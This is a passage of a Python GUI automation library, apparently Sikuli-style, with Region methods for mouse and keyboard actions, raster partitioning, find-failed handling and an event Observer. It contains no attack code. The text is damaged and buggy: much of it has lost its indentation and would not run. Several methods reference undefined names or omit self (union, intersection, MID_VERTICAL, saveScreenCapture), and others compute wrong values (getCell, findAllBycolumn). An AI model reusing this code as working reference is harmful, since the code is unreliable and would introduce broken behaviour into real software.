if Settings.ClickDelay > 0:
time.sleep(min(1.0, Settings.ClickDelay))
Settings.ClickDelay = 0.0
Mouse.click()
time.sleep(0.1)
if Settings.ClickDelay > 0:
time.sleep(min(1.0, Settings.ClickDelay))
Settings.ClickDelay = 0.0
Mouse.click()
time.sleep(0.1)
if modifiers != 0:
keyboard.keyUp(modifiers)
def rightClick(self, target=None, modifiers=""):
""" Moves the cursor to the target location and clicks the right mouse button. """
if target is None:
target = self._lastMatch or self # Whichever one is not None
target_location = None
if isinstance(target, Pattern):
target_location = self.find(target).getTarget()
elif isinstance(target, basestring):
target_location = self.find(target).getTarget()
elif isinstance(target, Match):
target_location = target.getTarget()
elif isinstance(target, Region):
target_location = target.getCenter()
elif isinstance(target, Location):
target_location = target
else:
raise TypeError("rightClick expected Pattern, String, Match, Region, or Location object")
if modifiers != "":
keyboard.keyDown(modifiers)
Mouse.moveSpeed(target_location, Settings.MoveMouseDelay)
time.sleep(0.1)
if Settings.ClickDelay > 0:
time.sleep(min(1.0, Settings.ClickDelay))
Settings.ClickDelay = 0.0
Mouse.click(button=Mouse.RIGHT)
time.sleep(0.1)
if modifiers != "":
keyboard.keyUp(modifiers)
def hover(self, target=None):
""" Moves the cursor to the target location """
if target is None:
target = self._lastMatch or self # Whichever one is not None
target_location = None
if isinstance(target, Pattern):
target_location = self.find(target).getTarget()
elif isinstance(target, basestring):
target_location = self.find(target).getTarget()
elif isinstance(target, Match):
target_location = target.getTarget()
elif isinstance(target, Region):
target_location = target.getCenter()
elif isinstance(target, Location):
target_location = target
else:
raise TypeError("hover expected Pattern, String, Match, Region, or Location object")
Mouse.moveSpeed(target_location, Settings.MoveMouseDelay)
def drag(self, dragFrom=None):
""" Starts a dragDrop operation.
Moves the cursor to the target location and clicks the mouse in preparation to drag
a screen element """
if dragFrom is None:
dragFrom = self._lastMatch or self # Whichever one is not None
dragFromLocation = None
if isinstance(dragFrom, Pattern):
dragFromLocation = self.find(dragFrom).getTarget()
elif isinstance(dragFrom, basestring):
dragFromLocation = self.find(dragFrom).getTarget()
elif isinstance(dragFrom, Match):
dragFromLocation = dragFrom.getTarget()
elif isinstance(dragFrom, Region):
dragFromLocation = dragFrom.getCenter()
elif isinstance(dragFrom, Location):
dragFromLocation = dragFrom
else:
raise TypeError("drag expected dragFrom to be Pattern, String, Match, Region, or Location object")
Mouse.moveSpeed(dragFromLocation, Settings.MoveMouseDelay)
time.sleep(Settings.DelayBeforeMouseDown)
Mouse.buttonDown()
Debug.history("Began drag at {}".format(dragFromLocation))
def dropAt(self, dragTo=None, delay=None):
""" Completes a dragDrop operation
Moves the cursor to the target location, waits ``delay`` seconds, and releases the mouse
button """
if dragTo is None:
dragTo = self._lastMatch or self # Whichever one is not None
if isinstance(dragTo, Pattern):
dragToLocation = self.find(dragTo).getTarget()
elif isinstance(dragTo, basestring):
dragToLocation = self.find(dragTo).getTarget()
elif isinstance(dragTo, Match):
dragToLocation = dragTo.getTarget()
elif isinstance(dragTo, Region):
dragToLocation = dragTo.getCenter()
elif isinstance(dragTo, Location):
dragToLocation = dragTo
else:
raise TypeError("dragDrop expected dragTo to be Pattern, String, Match, Region, or Location object")
Mouse.moveSpeed(dragToLocation, Settings.MoveMouseDelay)
time.sleep(delay if delay is not None else Settings.DelayBeforeDrop)
Mouse.buttonUp()
Debug.history("Ended drag at {}".format(dragToLocation))
def dragDrop(self, target, target2=None, modifiers=""):
""" Performs a dragDrop operation.
Holds down the mouse button on ``dragFrom``, moves the mouse to ``dragTo``, and releases
the mouse button.
``modifiers`` may be a typeKeys() compatible string. The specified keys will be held
during the drag-drop operation.
"""
if modifiers != "":
keyboard.keyDown(modifiers)
if target2 is None:
dragFrom = self._lastMatch
dragTo = target
else:
dragFrom = target
dragTo = target2
self.drag(dragFrom)
time.sleep(Settings.DelayBeforeDrag)
self.dropAt(dragTo)
if modifiers != "":
keyboard.keyUp(modifiers)
    def type(self, *args):
        """ Usage: type([PSMRL], text, [modifiers])

        If a pattern is specified, the pattern is clicked first. Doesn't support text paths.

        Special keys can be entered with the key name between brackets, as `"{SPACE}"`, or as
        `Key.SPACE`.
        """
        pattern = None
        text = None
        modifiers = None
        # Disambiguate the overloaded arguments by count and type
        if len(args) == 1 and isinstance(args[0], basestring):
            # Is a string (or Key) to type
            text = args[0]
        elif len(args) == 2:
            if not isinstance(args[0], basestring) and isinstance(args[1], basestring):
                pattern = args[0]
                text = args[1]
            else:
                text = args[0]
                modifiers = args[1]
        elif len(args) == 3 and not isinstance(args[0], basestring):
            pattern = args[0]
            text = args[1]
            modifiers = args[2]
        else:
            raise TypeError("type method expected ([PSMRL], text, [modifiers])")
        if pattern:
            self.click(pattern)
        Debug.history("Typing '{}' with modifiers '{}'".format(text, modifiers))
        kb = keyboard
        if modifiers:
            kb.keyDown(modifiers)
        # A pending one-shot TypeDelay overrides the default speed, then resets
        if Settings.TypeDelay > 0:
            typeSpeed = min(1.0, Settings.TypeDelay)
            Settings.TypeDelay = 0.0
        else:
            typeSpeed = self._defaultTypeSpeed
        kb.type(text, typeSpeed)
        if modifiers:
            kb.keyUp(modifiers)
        time.sleep(0.2)
def paste(self, *args):
""" Usage: paste([PSMRL], text)
If a pattern is specified, the pattern is clicked first. Doesn't support text paths.
``text`` is pasted as is using the OS paste shortcut (Ctrl+V for Windows/Linux, Cmd+V
for OS X). Note that `paste()` does NOT use special formatting like `type()`.
"""
target = None
text = ""
if len(args) == 1 and isinstance(args[0], basestring):
text = args[0]
elif len(args) == 2 and isinstance(args[1], basestring):
self.click(target)
text = args[1]
else:
raise TypeError("paste method expected [PSMRL], text")
pyperclip.copy(text)
# Triggers OS paste for foreground window
PlatformManager.osPaste()
time.sleep(0.2)
    def getClipboard(self):
        """ Returns the contents of the clipboard as a string.

        Can be used to pull outside text into the application, if it is first
        copied with the OS keyboard shortcut (e.g., "Ctrl+C") """
        return pyperclip.paste()
    def text(self):
        """ OCR method. Not implemented yet; always raises NotImplementedError. """
        raise NotImplementedError("OCR not yet supported")
    def mouseDown(self, button=Mouse.LEFT):
        """ Low-level mouse action: presses (and holds) the given mouse button. """
        return Mouse.buttonDown(button)
    def mouseUp(self, button=Mouse.LEFT):
        """ Low-level mouse action: releases the given mouse button. """
        return Mouse.buttonUp(button)
def mouseMove(self, PSRML=None, dy=0):
""" Low-level mouse actions """
if PSRML is None:
PSRML = self._lastMatch or self # Whichever one is not None
if isinstance(PSRML, Pattern):
move_location = self.find(PSRML).getTarget()
elif isinstance(PSRML, basestring):
move_location = self.find(PSRML).getTarget()
elif isinstance(PSRML, Match):
move_location = PSRML.getTarget()
elif isinstance(PSRML, Region):
move_location = PSRML.getCenter()
elif isinstance(PSRML, Location):
move_location = PSRML
elif isinstance(PSRML, int):
# Assume called as mouseMove(dx, dy)
offset = Location(PSRML, dy)
move_location = Mouse.getPos().offset(offset)
else:
raise TypeError("doubleClick expected Pattern, String, Match, Region, or Location object")
Mouse.moveSpeed(move_location)
def wheel(self, *args): # [PSRML], direction, steps
""" Clicks the wheel the specified number of ticks. Use the following parameters:
wheel([PSRML], direction, steps, [stepDelay])
"""
if len(args) == 2:
PSRML = None
direction = int(args[0])
steps = int(args[1])
stepDelay = None
elif len(args) == 3:
PSRML = args[0]
direction = int(args[1])
steps = int(args[2])
stepDelay = None
elif len(args) == 4:
PSRML = args[0]
direction = int(args[1])
steps = int(args[2])
stepDelay = int(args[3])
if PSRML is not None:
self.mouseMove(PSRML)
Mouse.wheel(direction, steps)
    def atMouse(self):
        """ Returns the current mouse position as a Location. """
        return Mouse.at()
    def keyDown(self, keys):
        """ Presses and holds the given keys. Concatenate multiple keys to press them all down. """
        return keyboard.keyDown(keys)
    def keyUp(self, keys):
        """ Releases the given keys. Concatenate multiple keys to release them all. """
        return keyboard.keyUp(keys)
    def write(self, text):
        """ Sikuli's write() with special formatting options. Not implemented yet;
        always raises NotImplementedError. """
        raise NotImplementedError()
def delayType(millisecs):
Settings.TypeDelay = millisecs
def isRegionValid(self):
""" Returns false if the whole region is not even partially inside any screen, otherwise true """
screens = PlatformManager.getScreenDetails()
for screen in screens:
s_x, s_y, s_w, s_h = screen["rect"]
if self.x+self.w >= s_x and s_x+s_w >= self.x and self.y+self.h >= s_y and s_y+s_h >= self.y:
# Rects overlap
return True
return False
    def clipRegionToScreen(self):
        """ Returns the part of the region that is visible on a screen

        If the region equals to all visible screens, returns Screen(-1).
        If the region is visible on multiple screens, returns the screen with the smallest ID.
        Returns None if the region is outside the screen.
        """
        if not self.isRegionValid():
            return None
        screens = PlatformManager.getScreenDetails()
        total_x, total_y, total_w, total_h = Screen(-1).getBounds()
        # NOTE(review): ``containing_screen`` is assigned but never used
        containing_screen = None
        for screen in screens:
            s_x, s_y, s_w, s_h = screen["rect"]
            if self.x >= s_x and self.x+self.w <= s_x+s_w and self.y >= s_y and self.y+self.h <= s_y+s_h:
                # Region completely inside screen
                return self
            elif self.x+self.w <= s_x or s_x+s_w <= self.x or self.y+self.h <= s_y or s_y+s_h <= self.y:
                # Region completely outside screen
                continue
            elif self.x == total_x and self.y == total_y and self.w == total_w and self.h == total_h:
                # Region equals all screens, Screen(-1)
                return self
            else:
                # Region partially inside screen
                # NOTE(review): this clamps the origin and caps w/h at the screen
                # size, but does not compute the true intersection rectangle
                # (w/h are not reduced by the clamped origin shift) — confirm
                x = max(self.x, s_x)
                y = max(self.y, s_y)
                w = min(self.w, s_w)
                h = min(self.h, s_h)
                return Region(x, y, w, h)
        return None
# Partitioning constants
NORTH = 202 # Upper half
NORTH_WEST = 300 # Left third in upper third
NORTH_MID = 301 # Middle third in upper third
NORTH_EAST = 302 # Right third in upper third
SOUTH = 212 # Lower half
SOUTH_WEST = 320 # Left third in lower third
SOUTH_MID = 321 # Middle third in lower third
SOUTH_EAST = 322 # Right third in lower third
EAST = 220 # Right half
EAST_MID = 310 # Middle third in right third
WEST = 221 # Left half
WEST_MID = 312 # Middle third in left third
MID_THIRD = 311 # Middle third in middle third
TT = 200 # Top left quarter
RR = 201 # Top right quarter
BB = 211 # Bottom right quarter
LL = 210 # Bottom left quarter
MID_VERTICAL = "MID_VERT" # Half of width vertically centered
MID_HORIZONTAL = "MID_HORZ" # Half of height horizontally centered
MID_BIG = "MID_HALF" # Half of width/half of height centered
    def setRaster(self, rows, columns):
        """ Sets the raster for the region, allowing sections to be indexed by row/column.

        Returns the top-left cell of the new raster (not ``self``); returns
        ``self`` unchanged if either dimension is not positive. """
        rows = int(rows)
        columns = int(columns)
        if rows <= 0 or columns <= 0:
            return self
        # Raster is stored as an immutable (rows, columns) tuple
        self._raster = (rows, columns)
        return self.getCell(0, 0)
def getRow(self, row, numberRows=None):
""" Returns the specified row of the region (if the raster is set)
If numberRows is provided, uses that instead of the raster
"""
row = int(row)
if self._raster[0] == 0 or self._raster[1] == 0:
return self
if numberRows is None or numberRows < 1 or numberRows > 9:
numberRows = self._raster[0]
rowHeight = self.h / numberRows
if row < 0:
# If row is negative, count backwards from the end
row = numberRows - row
if row < 0:
# Bad row index, return last row
return Region(self.x, self.y+self.h-rowHeight, self.w, rowHeight)
elif row > numberRows:
# Bad row index, return first row
return Region(self.x, self.y, self.w, rowHeight)
return Region(self.x, self.y + (row * rowHeight), self.w, rowHeight)
def getCol(self, column, numberColumns=None):
""" Returns the specified column of the region (if the raster is set)
If numberColumns is provided, uses that instead of the raster
"""
column = int(column)
if self._raster[0] == 0 or self._raster[1] == 0:
return self
if numberColumns is None or numberColumns < 1 or numberColumns > 9:
numberColumns = self._raster[1]
columnWidth = self.w / numberColumns
if column < 0:
# If column is negative, count backwards from the end
column = numberColumns - column
if column < 0:
# Bad column index, return last column
return Region(self.x+self.w-columnWidth, self.y, columnWidth, self.h)
elif column > numberColumns:
# Bad column index, return first column
return Region(self.x, self.y, columnWidth, self.h)
return Region(self.x + (column * columnWidth), self.y, columnWidth, self.h)
def getCell(self, row, column):
""" Returns the specified cell (if a raster is set for the region) """
row = int(row)
column = int(column)
if self._raster[0] == 0 or self._raster[1] == 0:
return self
rowHeight = self.h / self._raster[0]
columnWidth = self.h / self._raster[1]
if column < 0:
# If column is negative, count backwards from the end
column = self._raster[1] - column
if column < 0:
# Bad column index, return last column
column = self._raster[1]
elif column > self._raster[1]:
# Bad column index, return first column
column = 0
if row < 0:
# If row is negative, count backwards from the end
row = self._raster[0] - row
if row < 0:
# Bad row index, return last row
row = self._raster[0]
elif row > self._raster[0]:
# Bad row index, return first row
row = 0
return Region(self.x+(column*columnWidth), self.y+(row*rowHeight), columnWidth, rowHeight)
def get(self, part):
""" Returns a section of the region as a new region
Accepts partitioning constants, e.g. Region.NORTH, Region.NORTH_WEST, etc.
Also accepts an int 200-999:
* First digit: Raster (*n* rows by *n* columns)
* Second digit: Row index (if equal to raster, gets the whole row)
* Third digit: Column index (if equal to raster, gets the whole column)
Region.get(522) will use a raster of 5 rows and 5 columns and return
the cell in the middle.
Region.get(525) will use a raster of 5 rows and 5 columns and return the row in the middle.
"""
if part == self.MID_VERTICAL:
return Region(self.x+(self.w/4), y, self.w/2, self.h)
elif part == self.MID_HORIZONTAL:
return Region(self.x, self.y+(self.h/4), self.w, self.h/2)
elif part == self.MID_BIG:
return Region(self.x+(self.w/4), self.y+(self.h/4), self.w/2, self.h/2)
elif isinstance(part, int) and part >= 200 and part <= 999:
raster, row, column = str(part)
self.setRaster(raster, raster)
if row == raster and column == raster:
return self
elif row == raster:
return self.getCol(column)
elif column == raster:
return self.getRow(row)
else:
return self.getCell(row,column)
else:
return self
def setRows(self, rows):
""" Sets the number of rows in the raster (if columns have not been initialized, set to 1 as well) """
self._raster[0] = rows
if self._raster[1] == 0:
self._raster[1] = 1
def setCols(self, columns):
""" Sets the number of columns in the raster (if rows have not been initialized, set to 1 as well) """
self._raster[1] = columns
if self._raster[0] == 0:
self._raster[0] = 1
    def isRasterValid(self):
        """ Returns True if both raster dimensions are positive. """
        return self.getCols() > 0 and self.getRows() > 0
    def getRows(self):
        """ Returns the number of raster rows (0 if no raster is set). """
        return self._raster[0]
    def getCols(self):
        """ Returns the number of raster columns (0 if no raster is set). """
        return self._raster[1]
def getRowH(self):
if self._raster[0] == 0:
return 0
return self.h / self._raster[0]
def getColW(self):
if self._raster[1] == 0:
return 0
return self.w / self._raster[1]
    def showScreens(self):
        """ Synonym for Screen.showMonitors(). """
        Screen.showMonitors()
    def resetScreens(self):
        """ Synonym for Screen.resetMonitors(). """
        Screen.resetMonitors()
    def getTarget(self):
        """ By default, a region's click target is its center Location. """
        return self.getCenter()
    def setCenter(self, loc):
        """ Move this region so it is centered on ``loc`` (size unchanged). """
        offset = self.getCenter().getOffset(loc) # Calculate offset from current center
        return self.setLocation(self.getTopLeft().offset(offset)) # Move top left corner by the same offset
    def setTopLeft(self, loc):
        """ Move this region so its top left corner is on ``loc`` (size unchanged). """
        return self.setLocation(loc)
    def setTopRight(self, loc):
        """ Move this region so its top right corner is on ``loc`` (size unchanged). """
        offset = self.getTopRight().getOffset(loc) # Calculate offset from current top right
        return self.setLocation(self.getTopLeft().offset(offset)) # Move top left corner by the same offset
    def setBottomLeft(self, loc):
        """ Move this region so its bottom left corner is on ``loc`` (size unchanged). """
        offset = self.getBottomLeft().getOffset(loc) # Calculate offset from current bottom left
        return self.setLocation(self.getTopLeft().offset(offset)) # Move top left corner by the same offset
    def setBottomRight(self, loc):
        """ Move this region so its bottom right corner is on ``loc`` (size unchanged). """
        offset = self.getBottomRight().getOffset(loc) # Calculate offset from current bottom right
        return self.setLocation(self.getTopLeft().offset(offset)) # Move top left corner by the same offset
    def setSize(self, w, h):
        """ Sets the new size of the region, keeping the top left corner. Returns self. """
        self.setW(w)
        self.setH(h)
        return self
def setRect(self, *args):
""" Sets the rect of the region. Accepts the following arguments:
setRect(rect_tuple)
setRect(x, y, w, h)
setRect(rect_region)
"""
if len(args) == 1:
if isinstance(args[0], tuple):
x, y, w, h = args[0]
elif isinstance(args[0], Region):
x = Region.getX()
y = Region.getY()
w = Region.getW()
h = Region.getH()
else:
raise TypeError("Unrecognized arguments for setRect")
elif len(args) == 4:
x, y, w, h = args
else:
raise TypeError("Unrecognized arguments for setRect")
self.setX(x)
self.setY(y)
self.setW(w)
self.setH(h)
return self
def saveScreenCapture(self, path=None, name=None):
""" Saves the region's bitmap """
bitmap = self.getBitmap()
target_file = None
if path is None and name is None:
_, target_file = tempfile.mkstemp(".png")
elif name is None:
_, tpath = tempfile.mkstemp(".png")
target_file = os.path.join(path, tfile)
else:
target_file = os.path.join(path, name+".png")
cv2.imwrite(target_file, bitmap)
return target_file
    def getLastScreenImage(self):
        """ Gets the last image taken on this region's screen. """
        return self.getScreen().getLastScreenImageFromScreen()
def saveLastScreenImage(self):
""" Saves the last image taken on this region's screen to a temporary file """
bitmap = self.getLastScreenImage()
_, target_file = tempfile.mkstemp(".png")
cv2.imwrite(target_file, bitmap)
    def asOffset(self):
        """ Returns the bottom right corner as a Location offset from the top left corner. """
        return Location(self.getW(), self.getH())
    def rightAt(self, offset=0):
        """ Returns point in the center of the region's right side (offset to the right
        by ``offset``) """
        return Location(self.getX() + self.getW() + offset, self.getY() + (self.getH() / 2))
    def leftAt(self, offset=0):
        """ Returns point in the center of the region's left side (offset to the left
        by negative ``offset``) """
        return Location(self.getX() + offset, self.getY() + (self.getH() / 2))
    def aboveAt(self, offset=0):
        """ Returns point in the center of the region's top side (offset to the top
        by negative ``offset``) """
        return Location(self.getX() + (self.getW() / 2), self.getY() + offset)
    def bottomAt(self, offset=0):
        """ Returns point in the center of the region's bottom side (offset to the bottom
        by ``offset``) """
        return Location(self.getX() + (self.getW() / 2), self.getY() + self.getH() + offset)
def union(ur):
""" Returns a new region that contains both this region and the specified region """
x = min(self.getX(), ur.getX())
y = min(self.getY(), ur.getY())
w = max(self.getBottomRight().x, ur.getBottomRight().x) - x
h = max(self.getBottomRight().y, ur.getBottomRight().y) - y
return Region(x, y, w, h)
def intersection(ir):
""" Returns a new region that contains the overlapping portion of this region and the specified region (may be None) """
x = max(self.getX(), ur.getX())
y = max(self.getY(), ur.getY())
w = min(self.getBottomRight().x, ur.getBottomRight().x) - x
h = min(self.getBottomRight().y, ur.getBottomRight().y) - y
if w > 0 and h > 0:
return Region(x, y, w, h)
return None
def findAllByRow(self, target):
""" Returns an array of rows in the region (defined by the raster), each
row containing all matches in that row for the target pattern. """
row_matches = []
for row_index in range(self._raster[0]):
row = self.getRow(row_index)
row_matches[row_index] = row.findAll(target)
return row_matches
def findAllBycolumn(self, target):
""" Returns an array of columns in the region (defined by the raster), each
column containing all matches in that column for the target pattern. """
column_matches = []
for column_index in range(self._raster[1]):
column = self.getRow(column_index)
column_matches[column_index] = column.findAll(target)
return column_matches
    def findBest(self, pattern):
        """ Returns the *best* match in the region (instead of the first match). """
        findFailedRetry = True
        while findFailedRetry:
            best_match = None
            all_matches = self.findAll(pattern)
            # Keep the match with the highest similarity score
            for match in all_matches:
                if best_match is None or best_match.getScore() < match.getScore():
                    best_match = match
            self._lastMatch = best_match
            if best_match is not None:
                break
            path = pattern.path if isinstance(pattern, Pattern) else pattern
            # May raise FindFailed, return False (abort), or True (retry)
            findFailedRetry = self._raiseFindFailed("Could not find pattern '{}'".format(path))
            if findFailedRetry:
                time.sleep(self._repeatWaitTime)
        return best_match
def compare(self, image):
""" Compares the region to the specified image """
return exists(Pattern(image), 0)
    def findText(self, text, timeout=None):
        """ OCR function. Not implemented yet; always raises NotImplementedError. """
        raise NotImplementedError()
    def findAllText(self, text):
        """ OCR function. Not implemented yet; always raises NotImplementedError. """
        raise NotImplementedError()
# Event Handlers
    def onAppear(self, pattern, handler=None):
        """ Registers an event to call ``handler`` when ``pattern`` appears in this region.

        The ``handler`` function should take one parameter, an ObserveEvent object
        (see below). This event is ignored in the future unless the handler calls
        the repeat() method on the provided ObserveEvent object.

        Returns the event's ID as a string.
        """
        return self._observer.register_event("APPEAR", pattern, handler)
    def onVanish(self, pattern, handler=None):
        """ Registers an event to call ``handler`` when ``pattern`` disappears from this region.

        The ``handler`` function should take one parameter, an ObserveEvent object
        (see below). This event is ignored in the future unless the handler calls
        the repeat() method on the provided ObserveEvent object.

        Returns the event's ID as a string.
        """
        return self._observer.register_event("VANISH", pattern, handler)
    def onChange(self, min_changed_pixels=None, handler=None):
        """ Registers an event to call ``handler`` when at least ``min_changed_pixels``
        change in this region.

        (Default for min_changed_pixels is set in Settings.ObserveMinChangedPixels)

        The ``handler`` function should take one parameter, an ObserveEvent object
        (see below). This event is ignored in the future unless the handler calls
        the repeat() method on the provided ObserveEvent object.

        Returns the event's ID as a string.
        """
        # Two call shapes: onChange(threshold, handler) or onChange(handler).
        # The current bitmap is captured now as the change baseline.
        if isinstance(min_changed_pixels, int) and (callable(handler) or handler is None):
            return self._observer.register_event(
                "CHANGE",
                pattern=(min_changed_pixels, self.getBitmap()),
                handler=handler)
        elif (callable(min_changed_pixels) or min_changed_pixels is None) and (callable(handler) or handler is None):
            # First positional arg was actually the handler (or omitted entirely)
            handler = min_changed_pixels or handler
            return self._observer.register_event(
                "CHANGE",
                pattern=(Settings.ObserveMinChangedPixels, self.getBitmap()),
                handler=handler)
        else:
            raise ValueError("Unsupported arguments for onChange method")
def isChanged(self, min_changed_pixels, screen_state):
    """ Returns true if at least ``min_changed_pixels`` are different between
    ``screen_state`` and the current state.
    """
    # Grab the on-screen pixels for the visible portion of this region and
    # count how many differ from the stored baseline.
    current_state = self.clipRegionToScreen().getBitmap()
    changed = numpy.count_nonzero(numpy.subtract(current_state, screen_state))
    return changed >= min_changed_pixels
def observe(self, seconds=None):
    """ Begins the observer loop (synchronously).

    Loops for ``seconds`` or until this region's stopObserver() method is called.
    If ``seconds`` is None, the observer loop cycles until stopped. If this
    method is called while the observer loop is already running, it returns False.

    Returns True if the observer could be started, False otherwise.
    """
    if self._observer.isRunning:
        return False  # another observer loop is already active
    # A deadline of None means "run until explicitly stopped".
    deadline = None if seconds is None else time.time() + seconds
    while not self._observer.isStopped:
        if deadline is not None and time.time() >= deadline:
            break
        self._observer.check_events()
        # Pause so the loop runs at the configured scans-per-second rate.
        time.sleep(1 / self.getObserveScanRate())
    return True
def getObserveScanRate(self):
    """ Gets the number of times per second the observe loop should run """
    # A per-region override wins; otherwise fall back to the global setting.
    return self._observeScanRate if self._observeScanRate is not None else Settings.ObserveScanRate

def setObserveScanRate(self, scan_rate):
    """ Set the number of times per second the observe loop should run """
    self._observeScanRate = scan_rate

def getRepeatWaitTime(self):
    """ Gets the wait time before repeating a search """
    return self._repeatWaitTime

def setRepeatWaitTime(self, wait_time):
    """ Sets the wait time before repeating a search """
    self._repeatWaitTime = wait_time
def observeInBackground(self, seconds=None):
    """ As Region.observe(), but runs in a background process, allowing the rest
    of your script to continue.

    Note that the subprocess operates on *copies* of the usual objects, not the original
    Region object itself for example. If your event handler needs to share data with your
    main process, check out the documentation for the ``multiprocessing`` module to set up
    shared memory.
    """
    if self._observer.isRunning:
        return False
    # NOTE(review): isRunning is checked but never set here; it appears to be
    # managed elsewhere -- confirm the child process actually updates it.
    self._observer_process = multiprocessing.Process(target=self.observe, args=(seconds,))
    self._observer_process.start()
    return True
def stopObserver(self):
    """ Stops this region's observer loop.

    If this is running in a subprocess, the subprocess will end automatically.
    """
    self._observer.isStopped = True
    self._observer.isRunning = False

def hasObserver(self):
    """ Check whether at least one event is registered for this region.

    The observer may or may not be running.
    """
    return self._observer.has_events()

def isObserving(self):
    """ Check whether an observer is running for this region """
    return self._observer.isRunning

def hasEvents(self):
    """ Check whether any events have been caught for this region """
    return len(self._observer.caught_events) > 0
def getEvents(self):
    """ Returns a list of all events that have occurred.

    Empties the internal queue.
    """
    # Swap the queue out atomically, then re-arm each caught event type so it
    # can fire again on subsequent observe passes.
    pending, self._observer.caught_events = self._observer.caught_events, []
    for evt in pending:
        self._observer.activate_event(evt["name"])
    return pending
def getEvent(self, name):
    """ Returns the named event.

    Removes it from the internal queue.
    """
    queue = self._observer.caught_events
    found = next((evt for evt in queue if evt["name"] == name), None)
    if found:
        # Remove from the queue and re-arm the event type for future catches.
        queue.remove(found)
        self._observer.activate_event(found["name"])
    return found
def setInactive(self, name):
    """ The specified event is ignored until reactivated
    or until the observer restarts.
    """
    self._observer.inactivate_event(name)

def setActive(self, name):
    """ Activates an inactive event type. """
    self._observer.activate_event(name)
def _raiseImageMissing(self, pattern):
    """ Builds an ImageMissing event and triggers the default handler (or the custom handler,
    if one has been specified). Returns True if throwing method should retry, False if it
    should skip, and throws an exception if it should abort. """
    event = ImageMissingEvent(self, pattern=pattern, event_type="MISSING")
    if self._imageMissingHandler is not None:
        self._imageMissingHandler(event)
    # A response set by the handler takes precedence over the region default.
    response = (event._response or self._findFailedResponse)
    #if response == "PROMPT": # Prompt not valid for ImageMissing error
    # response = _findFailedPrompt(pattern)
    if response == "ABORT":
        raise FindFailed(event)
    elif response == "SKIP":
        return False
    elif response == "RETRY":
        return True
    # NOTE(review): any other response (e.g. "PROMPT") falls through and
    # implicitly returns None, which callers treat as falsy/skip -- confirm intended.

def setImageMissingHandler(self, handler):
    """ Set a handler to receive ImageMissing events (instead of triggering
    an exception). """
    if not callable(handler):
        raise ValueError("Expected ImageMissing handler to be a callable")
    self._imageMissingHandler = handler
## FindFailed event handling ##

# Constants: the four possible reactions to a failed find.
ABORT = "ABORT"
SKIP = "SKIP"
PROMPT = "PROMPT"
RETRY = "RETRY"

def setFindFailedResponse(self, response):
    """ Set the response to a FindFailed exception in this region.

    Can be ABORT, SKIP, PROMPT, or RETRY. """
    valid_responses = ("ABORT", "SKIP", "PROMPT", "RETRY")
    if response not in valid_responses:
        raise ValueError("Invalid response - expected one of ({})".format(", ".join(valid_responses)))
    self._findFailedResponse = response

def setFindFailedHandler(self, handler):
    """ Set a handler to receive FindFailed events (instead of triggering
    an exception). """
    if not callable(handler):
        raise ValueError("Expected FindFailed handler to be a callable")
    self._findFailedHandler = handler

def getFindFailedResponse(self):
    """ Returns the current default response to a FindFailed exception """
    return self._findFailedResponse

def setThrowException(self, setting):
    """ Defines whether an exception should be thrown for FindFailed operations.

    ``setting`` should be True or False. """
    # Keep the legacy boolean flag and the response constant in sync.
    if setting:
        self._throwException = True
        self._findFailedResponse = "ABORT"
    else:
        self._throwException = False
        self._findFailedResponse = "SKIP"

def getThrowException(self):
    """ Returns True if an exception will be thrown for FindFailed operations,
    False otherwise. """
    return self._throwException
def _raiseFindFailed(self, pattern):
    """ Builds a FindFailed event and triggers the default handler (or the custom handler,
    if one has been specified). Returns True if throwing method should retry, False if it
    should skip, and throws an exception if it should abort. """
    event = FindFailedEvent(self, pattern=pattern, event_type="FINDFAILED")
    if self._findFailedHandler is not None:
        self._findFailedHandler(event)
    # Handler-chosen response wins; otherwise fall back to the region default.
    response = event._response or self._findFailedResponse
    if response == "PROMPT":
        response = _findFailedPrompt(pattern)
    if response == "ABORT":
        raise FindFailed(event)
    # SKIP -> False, RETRY -> True, anything else -> None (falsy).
    return {"SKIP": False, "RETRY": True}.get(response)
def _findFailedPrompt(self, pattern):
    """ Shows an abort/retry/ignore dialog for a failed find and maps the
    user's choice onto the corresponding response constant. """
    choice = tkmb.showerror(
        title="Sikuli Prompt",
        message="Could not find target '{}'. Abort, retry, or skip?".format(pattern),
        type=tkmb.ABORTRETRYIGNORE)
    # Dialog buttons come back lowercase; "ignore" maps onto SKIP.
    return {"abort": "ABORT", "retry": "RETRY", "ignore": "SKIP"}[choice]
class Observer(object):
    """ Watches a Region for APPEAR/VANISH/CHANGE events registered against it.

    Events are stored as dicts keyed by a generated uuid name; caught events
    accumulate in ``caught_events`` until the region drains them.
    """
    def __init__(self, region):
        self._supported_events = ("APPEAR", "VANISH", "CHANGE")
        self._region = region
        self._events = {}
        self.isStopped = False
        self.isRunning = False
        self.caught_events = []

    def inactivate_event(self, name):
        """ Suppress the named event until it is reactivated. """
        # Fix: events are plain dicts, so attribute assignment
        # (``self._events[name].active = False``) raised AttributeError;
        # item assignment is what check_events() actually reads.
        if name in self._events:
            self._events[name]["active"] = False

    def activate_event(self, name):
        """ Re-arm the named event so check_events() considers it again. """
        # Fix: same dict attribute-vs-item bug as inactivate_event().
        if name in self._events:
            self._events[name]["active"] = True

    def has_events(self):
        """ True if at least one event has been registered. """
        return len(self._events) > 0

    def register_event(self, event_type, pattern, handler):
        """ When ``event_type`` is observed for ``pattern``, triggers ``handler``.

        For "CHANGE" events, ``pattern`` should be a tuple of ``min_changed_pixels`` and
        the base screen state.

        Returns the generated event name.
        """
        if event_type not in self._supported_events:
            raise ValueError("Unsupported event type {}".format(event_type))
        if event_type != "CHANGE" and not isinstance(pattern, Pattern) and not isinstance(pattern, basestring):
            raise ValueError("Expected pattern to be a Pattern or string")
        if event_type == "CHANGE" and not (len(pattern)==2 and isinstance(pattern[0], int) and isinstance(pattern[1], numpy.ndarray)):
            raise ValueError("For \"CHANGE\" events, ``pattern`` should be a tuple of ``min_changed_pixels`` and the base screen state.")
        # Create event object
        event = {
            "pattern": pattern,
            "event_type": event_type,
            "count": 0,
            "handler": handler,
            "name": uuid.uuid4(),
            "active": True
        }
        self._events[event["name"]] = event
        return event["name"]

    def check_events(self):
        """ Evaluate every active registered event against the region's
        current state, firing handlers and recording catches. """
        for event_name in self._events.keys():
            event = self._events[event_name]
            if not event["active"]:
                continue
            event_type = event["event_type"]
            pattern = event["pattern"]
            handler = event["handler"]
            if event_type == "APPEAR" and self._region.exists(event["pattern"], 0):
                # Call the handler with a new ObserveEvent object
                appear_event = ObserveEvent(self._region,
                                            count=event["count"],
                                            pattern=event["pattern"],
                                            event_type=event["event_type"])
                if callable(handler):
                    handler(appear_event)
                # NOTE(review): APPEAR queues the event even when a handler ran,
